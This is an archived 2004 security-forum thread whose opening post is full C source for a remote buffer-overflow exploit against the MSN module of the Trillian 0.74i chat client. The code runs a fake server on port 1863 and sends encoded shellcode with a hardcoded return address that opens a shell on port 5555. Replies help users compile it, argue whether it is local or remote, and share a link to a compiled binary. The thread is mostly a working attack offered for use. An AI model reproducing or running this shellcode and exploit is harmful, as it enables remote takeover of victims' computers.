Trillian 0.74i Remote (msn Module) Buffer Overflow

Full Version: Trillian 0.74i Remote (msn Module) Buffer Overflow

GovernmentSecurity.org > The Archives > Exploit Articles

Paul

Sep 8 2004, 02:21 PM

CODE

/*
Cerulean Studios Trillian 0.74i Buffer Overflow in MSN module exploit
created by Komrade - unsecure altervista org

Written for Windows 2000 / Windows XP.
Tested on Windows XP Professional sp0.

This exploit spawn a shell on port 5555, you have just to execute the
program and connect to port 5555.
*/

#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <string.h>

int main(int argc,char **argv){

char shellcode[] =
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x66\x01\x80\x34\x0A\x99\xE2\xFA\xEB"
"\x05\xE8\xEB\xFF\xFF\xFF\x70\x99\x98\x99\x99\xC3\xFD\x12\xD8\xA9\x12"
"\xD9\x95\x12\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12"
"\xEF\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8"
"\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E"
"\x9D\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12"
"\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71\xE5"
"\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3\x9D\xC0"
"\x71\xF0\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66\xCE\x69\x12"
"\x41\x5E\x9E\x9B\x99\x8C\x2A\xAA\x59\x10\xDE\x9D\xF3\x89\xCE\xCA\x66"
"\xCE\x6D\xF3\x98\xCA\x66\xCE\x61\xC9\xC9\xCA\x66\xCE\x65\x1A\x75\xDD"
"\x12\x6D\xAA\x42\xF3\x89\xC0\x10\x85\x17\x7B\x62\x10\xDF\xA1\x10\xDF"
"\xA5\x10\xDF\xD9\x5E\xDF\xB5\x98\x98\x99\x99\x14\xDE\x89\xC9\xCF\xCA"
"\xCA\xCA\xF3\x98\xCA\xCA\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9"
"\xCA\x66\xCE\x7D\xC9\x66\xCE\x71\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB"
"\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\x62\x67\x66\x66"
"\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB"
"\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED"
"\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8"
"\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA"
"\xF2\xFC\xED\xD8\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99"
"\xF8\xFA\xFA\xFC\xE9\xED\x99";

SOCKET sock, client;
struct sockaddr_in sock_addr, client_addr;
WSADATA data;
WORD p;
char mess[4096];
int lun, n, i;

p = MAKEWORD(2, 0);
WSAStartup(p, &data);

printf("------------------------------------------------------------------------\r\n");
printf("- Cerulean Studios Trillian 0.74i MSN module Buffer Overflow exploit -\r\n");
printf("- for Windows 2000 / Windows XP -\r\n");
printf("- -\r\n");
printf("- created by Komrade - http://unsecure.altervista.org -\r\n");
printf("------------------------------------------------------------------------\r\n");

sock = socket(PF_INET,SOCK_STREAM, 0);
sock_addr.sin_family = PF_INET;
sock_addr.sin_port = htons(1863);
sock_addr.sin_addr.s_addr = INADDR_ANY;

bind(sock, (struct sockaddr*)&sock_addr, sizeof(struct sockaddr_in));
listen(sock,1);

lun = sizeof (struct sockaddr);

printf("\r\nWaiting for a connection...\r\n");

client = accept(sock, (struct sockaddr*)&client_addr, &lun);
if (client <= 0){
printf("Unable to wait for connections\r\n");
exit(-1);
}

n=recv(client, mess, sizeof(mess),0);
if (n < 0){
printf("Error receving connections\r\n");
exit(-1);
}

printf("Received a connection request from a client.\r\n");

strcpy(mess, shellcode);

for(i=strlen(shellcode); i < 4090; i++)
mess[i]='x';

mess[i]=0x33; /**/
mess[i+1]=0x12; /*return address of a "call ebx" command in trillian.exe*/
mess[i+2]=0x40; /**/
mess[i+3]='\r';
mess[i+4]='\n';
mess[i+5]='\0';

n = send(client, mess, strlen(mess),0);
if (n > 0){
printf("Exploit sent succesfully.\r\n");
printf("Now connect to port 5555.\r\n");
}
else
printf("Error sending the exploit\r\n");

closesocket (client);
closesocket(sock);
WSACleanup();
return 0;
}

ivan288

Sep 8 2004, 03:40 PM

looking good

gonna search for what port it runs ...

ducky

Sep 8 2004, 04:02 PM

Think it's the port of MSN msngr...

MxMx

Sep 8 2004, 04:08 PM

there is no standard MSN port ..
MSN uses a portrange as far as I know ..
not sure which range this is

stonebreaker

Sep 8 2004, 04:10 PM

i think this exploit is like a daemon.waiting for msn to connect
and then send data.

MxMx

Sep 8 2004, 04:12 PM

MSN Messenger TCP 6891 - 6900 Wide port range
TCP 1863 Wide port range
UDP 1863 Wide port range
UDP 5190 Wide port range
UDP 6901 Wide port range
TCP 6901 Wide port range

http://www.usr.com/support/doc-popup-templ...g/portlist.html

mortello

Sep 8 2004, 04:24 PM

QUOTE (stonebreaker @ Sep 8 2004, 04:10 PM)

i think this exploit is like a daemon.waiting for msn to connect
and then send data.

I believe you're right because of this line

QUOTE

printf("Received a connection request from a client.\r\n");

Figo

Sep 8 2004, 04:29 PM

QUOTE

DETAILS
A buffer overflow vulnerability in basic edition version 0.74i (latest version) occours in the MSN module when receiving a string of around 4096 bytes ended with a newline character from an MSN messenger server. This vulnerability is remotely exploitable but require the use of the man-in-the-middle technique.

say's it all guy's, victim connects to the deamon(exploit) sends overlflow, spawns shell

Hellraiseruk

Sep 8 2004, 05:48 PM

tryed to compile in C++ and get the following errors

trill.obj : error LNK2001: unresolved external symbol _WSACleanup@0
trill.obj : error LNK2001: unresolved external symbol _closesocket@4
trill.obj : error LNK2001: unresolved external symbol _send@16
trill.obj : error LNK2001: unresolved external symbol _recv@16
trill.obj : error LNK2001: unresolved external symbol _accept@12
trill.obj : error LNK2001: unresolved external symbol _listen@8
trill.obj : error LNK2001: unresolved external symbol _bind@12
trill.obj : error LNK2001: unresolved external symbol _htons@4
trill.obj : error LNK2001: unresolved external symbol _socket@12
trill.obj : error LNK2001: unresolved external symbol _WSAStartup@8
Debug/trill.exe : fatal error LNK1120: 10 unresolved externals
Error executing link.exe.

trill.exe - 11 error(s), 0 warning(s)

sounds qwite intresting to test

nice code Paul

Figo

Sep 8 2004, 06:46 PM

omg dude, use ur brain for once...

CODE

LNK2001: unresolved external symbol _WSACleanup@0

for all errors there is an explanation, thats why it gives errors, for debugging reason so you know whats going on...

download w2_32.dll, w2_32.lib and add the lib to your linker options

da_cash

Sep 8 2004, 07:50 PM

for VC 6 just add the wsock32.lib under PROJECT SETTINGS >> LINK >> Object/library modules

here's full compiled ver for ur pleasure..

http://dacash.freelinuxhost.com/trilian.zip

as the source says exploit is setup to listen on port 1863...

chris105

Sep 8 2004, 08:54 PM

Figo leave it out with the "OMG dude" please mate. Polite question. Polite answer. Tell him its simple and he should learn C or whatever if you must but do it nicely please.

Hellraiseruk

Sep 8 2004, 08:59 PM

"Figo"

i don't really use c++ often anymore....so don't have a clue when errors appear

cheerz da_cash for compiled version

morbido

Sep 8 2004, 09:07 PM

looks like a local exploit

Hellraiseruk

Sep 8 2004, 09:09 PM

dam!

Killahbee

Sep 8 2004, 09:12 PM

QUOTE (morbido @ Sep 8 2004, 09:07 PM)

looks like a local exploit

Replying to Trillian 0.74i Remote (msn Module) Buffer Overflow

really?

Nostremato

Sep 9 2004, 12:35 AM

yes it´s only local

cyrixx

Sep 9 2004, 10:22 AM

QUOTE

Cerulean Studios Trillian 0.74i Buffer Overflow in MSN module exploit
created by Komrade - unsecure altervista org

not remote

mathofaka

Sep 10 2004, 02:44 AM

QUOTE (MxMx @ Sep 8 2004, 10:12 AM)

MSN Messenger TCP 6891 - 6900 Wide port range
TCP 1863 Wide port range
UDP 1863 Wide port range
UDP 5190 Wide port range
UDP 6901 Wide port range
TCP 6901 Wide port range

http://dacash.freelinuxhost.com/trilian.zip

ure link dosent work or its just ma ie

Figo

Sep 10 2004, 06:37 AM

thought i was beeing polite

digitzero

Sep 10 2004, 07:49 PM

http://unsecure.altervista.org/security/trillianbof.c

Looks pretty remote to me ;]

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.